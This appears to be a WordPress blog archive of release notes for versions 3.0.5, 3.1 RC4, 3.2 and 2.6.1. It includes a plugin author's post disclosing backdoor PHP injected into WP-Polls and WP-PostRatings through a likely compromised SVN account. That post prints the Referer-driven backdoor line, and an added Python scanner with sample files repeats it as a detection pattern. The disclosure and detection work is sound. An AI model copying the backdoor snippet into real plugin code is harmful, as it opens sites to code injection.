WordPress 3.0.5 & 3.1 RC4

WordPress 3.0.5 & 3.1 RC4 have been released:

WordPress 3.0.5

WordPress 3.0.5 is now available and is a security hardening update for all previous WordPress versions.

This security release is required if you have any untrusted user accounts, but it also comes with important security enhancements and hardening. All WordPress users are strongly encouraged to update.

Three point oh point five
Enhances security
Three point one comes soon

The release addresses a number of issues and provides two additional enhancements:

Two moderate security issues were fixed that could have allowed a Contributor- or Author-level user to gain further access to the site.

One information disclosure issue was addressed that could have allowed an Author-level user to view contents of posts they should not be able to see, such as draft or private posts.

Two security enhancements were added. One improved the security of any plugins which were not properly leveraging our security API. The other offers additional defense in depth against a vulnerability that was fixed in a previous release.

Thanks to Nils Jueneman and Saddy for their private and responsible disclosures to security@wordpress.org for two of the issues. The others were reported or repaired by our security team.

Changelog: WordPress 3.0.5
Download: WordPress 3.0.5
Download: Modified files since WordPress 3.0.4

WordPress 3.1 RC4

The Release Candidate 4 build includes the security fixes and enhancements included in 3.0.5 and addresses about two dozen additional bugs. This includes fixes for:

  • Deleting a user and reassigning their posts to another user.
  • Marking multiple users or sites as spam in multisite.
  • PHP4 compatibility.

As outlined in previous RC posts, if you are testing the release candidate and think you’ve found a bug, there are a few ways to let us know:

To test WordPress 3.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If any new issues become known, you’ll be able to find them here.

After nearly five months of development and testing, we think we’re very close to a final release. Users and developers, please test your themes and plugins.

Download: WordPress 3.1 RC4


Code Injection Follow Up

I have released 2 security updates to WP-Polls and WP-PostRatings which basically remove malicious code that allows code injection.

The malicious code is as follows:

// Injected check: compares the script path with a URL built from the attacker-controlled Referer header
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
    return;

The code itself does nothing, but hackers are spoofing $_SERVER['HTTP_REFERER'], which allows arbitrary code injection. Note the @ sign, which suppresses all errors, and hence the error will not be displayed.

I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.

  • Personally, I have no idea what links_add_base_url() does, and hence it is impossible for me to have placed it in my own plugin code.
  • I checked the commit date for the changeset of WP-PostRatings, and the date/time is 11/04/10 22:10:13. Since I am in the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
  • The above changeset is for trunk. However, in my readme.txt I have stated that the stable tag is 1.50, and hence the file is copied to /tags/1.50/ in this changeset. If you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and almost 9am in my timezone; I would be in my office, and my office computer does not have SVN copies of my plugin. So it is also not possible for me to have committed that file.
  • If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do an SVN copy for my plugins; normally I just copy and paste the files using Windows Explorer.
  • For WP-Polls, there is only 1 changeset, as my stable tag is from trunk, and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. In my timezone it is about 8.30pm, and it is not possible for me to check in because 8pm to 9pm is my dinner time and I always eat out.
  • For WP-WAP, there are also 2 suspicious commits, here and here. As I do not develop WP-WAP anymore, there is no reason for me to commit something to it.

I am going to review all my commits to the SVN to ensure that no more suspicious code has been added.
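The indicator quoted above is concrete enough to scan for. The following Python scanner is an added example, not code from the plugin author or from WordPress: it flags the exact injected call (@links_add_base_url(...) fed by $_SERVER['HTTP_REFERER']) and, as a generalization, any error-suppressed @ call that receives request-controlled data ($_GET, $_POST, $_COOKIE, $_REQUEST or an HTTP_* header) as an argument. The plugin files it scans are constructed inline for the demonstration; the generalized rule is a heuristic assumption for triage, not a proof of compromise.

```python
"""Scan PHP plugin sources for Referer-driven backdoor indicators.

Rule 1 (known-backdoor-indicator): the literal pattern from the
WP-Polls / WP-PostRatings incident, an @-suppressed links_add_base_url()
call that receives $_SERVER['HTTP_REFERER'].

Rule 2 (suppressed-call-with-request-data): an assumed generalization:
any @-suppressed function call whose arguments contain request-controlled
data. Error suppression around attacker-reachable input is a triage signal,
not a verdict; review each hit by hand.
"""
import re
from dataclasses import dataclass

# Constructed sample plugin files for the demonstration (not real plugin code).
SAMPLES = {
    "wp-polls/wp-polls.php": (
        "<?php\n"
        "function vote_poll() {\n"
        "    if ($_SERVER['PHP_SELF'] == @links_add_base_url(\"/\", $_SERVER['HTTP_REFERER']))\n"
        "        return;\n"
        "    // ... legitimate voting code ...\n"
        "}\n"
    ),
    "wp-postratings/postratings.php": (
        "<?php\n"
        "$rating = intval($_POST['rate']);\n"
        "@unlink($_GET['tmp']);\n"                       # suppressed call fed by request data
        "$ref = esc_url($_SERVER['HTTP_REFERER']);\n"    # no @, escaped: not flagged
    ),
    "clean-plugin/clean.php": (
        "<?php\n"
        "@ini_set('display_errors', 0);\n"              # suppressed, but no request data
        "echo esc_html($_GET['q']);\n"
    ),
}

# Request-controlled sources: superglobals and HTTP_* request headers.
TAINTED = re.compile(r"\$_(?:GET|POST|COOKIE|REQUEST|SERVER\s*\[\s*['\"]HTTP_\w+['\"]\s*\])")

# Rule 1: the exact indicator from the incident.
EXACT = re.compile(r"@links_add_base_url\s*\(.*?\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]")

# Rule 2: an @-prefixed call; group 2 is its argument list up to the first ')'.
SUPPRESSED_CALL = re.compile(r"@\s*([A-Za-z_]\w*)\s*\((.*?)\)")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    snippet: str


def scan_source(path, source):
    """Return findings for one PHP file, in line order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if EXACT.search(line):
            findings.append(Finding(path, lineno, "known-backdoor-indicator", line.strip()))
            continue  # already reported; do not double-count under rule 2
        for call in SUPPRESSED_CALL.finditer(line):
            if TAINTED.search(call.group(2)):
                findings.append(Finding(path, lineno, "suppressed-call-with-request-data", line.strip()))
                break
    return findings


def scan_all(files):
    """Scan a mapping of path -> source text; returns findings in file order."""
    out = []
    for path, src in files.items():
        out.extend(scan_source(path, src))
    return out


if __name__ == "__main__":
    for f in scan_all(SAMPLES):
        print(f"{f.path}:{f.line} [{f.rule}] {f.snippet}")
```

Run against a real checkout, replace SAMPLES with a walk over the plugin directory's .php files; rule 1 hits should be treated as a confirmed indicator of the injected snippet, while rule 2 hits need a human look, since legitimate code occasionally suppresses errors on user-supplied paths.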


WordPress 3.2

WordPress 3.2 has been released, and over in the US it is the 4th of July, aka Independence Day!

Here in the U.S. we are observing Independence Day, and I can’t think of a more fitting way to mark a day that celebrates freedom than by releasing more free software to help democratize publishing around the globe. I’m excited to announce that WordPress 3.2 is now available to the world, both as an update in your dashboard and a download on WordPress.org. Version 3.2 is our fifteenth major release of WordPress and comes just four months after 3.1 (which coincidentally just passed the 15 million download mark this morning), reflecting the growing speed of development in the WordPress community and our dedication to getting improvements in your hands as soon as possible. We’re dedicating this release to noted composer and pianist George Gershwin.

The focus for this release was making WordPress faster and lighter. The first thing you’ll notice when you log in to 3.2 is a refreshed dashboard design that tightens the typography, design, and code behind the admin. (Rhapsody in Grey?) If you’re starting a new blog, you’ll also appreciate the fully HTML5 new Twenty Eleven theme, fulfilling our plan to replace the default theme every year. Start writing your first post in our redesigned post editor and venture to the full-screen button in the editing toolbar to enter the new distraction-free writing or zen mode, my personal favorite feature of the release. All of the widgets, menus, buttons, and interface elements fade away to allow you to compose and edit your thoughts in a completely clean environment conducive to writing, but when your mouse strays to the top of the screen your most-used shortcuts are right there where you need them. (I like to press F11 to take my browser full-screen, getting rid of even the OS chrome.)

Under the hood there have been a number of improvements, not the least of which is the streamlining enabled by our previously announced plan of retiring support for PHP4, older versions of MySQL, and legacy browsers like IE6, which allows us to take advantage of more features enabled by new technologies. The admin bar has a few more shortcuts to your most commonly-used actions. On the comment moderation screen, the new approve & reply feature speeds up your conversation management. You’ll notice in your first update after 3.2 that we’ll only be updating the files that have changed with each new release instead of every file in your WordPress installation, which makes updates significantly faster on all hosting platforms. There are also some fun new theme features shown off by Twenty Eleven, like the ability to have multiple rotating header images to highlight all of your favorite photos.

Download: WordPress 3.2
Codex: WordPress 3.2
Trac: WordPress 3.2


WordPress 2.6.1

WordPress 2.6.1 has been released, and it is a very minor release. No security flaws have been found, and hence WordPress 2.6.1 is not a security fix, so if you are comfortable with WordPress 2.6 like me, you don’t have to upgrade.

2.6.1 offers several improvements for international users. Styling of the admin for right-to-left languages is much improved thanks to the efforts of the Farsi and Hebrew translation teams, and a mysterious gettext bug caused by certain PHP configurations is now fixed. For IIS users, 2.6.1 fixes several permalink problems. Image insertion problems in the Press This feature experienced by IE users are also fixed. Of note to everyone is a fix for a performance bug in the admin where those with a lot of plugins would experience slowness on some pages.

I am so looking forward to WordPress 2.7, as lots of features which are currently available as plugins will be built into the core.

Download WordPress 2.6.1

*UPDATE* I decided to upgrade to stop the nagging upgrade message from appearing.
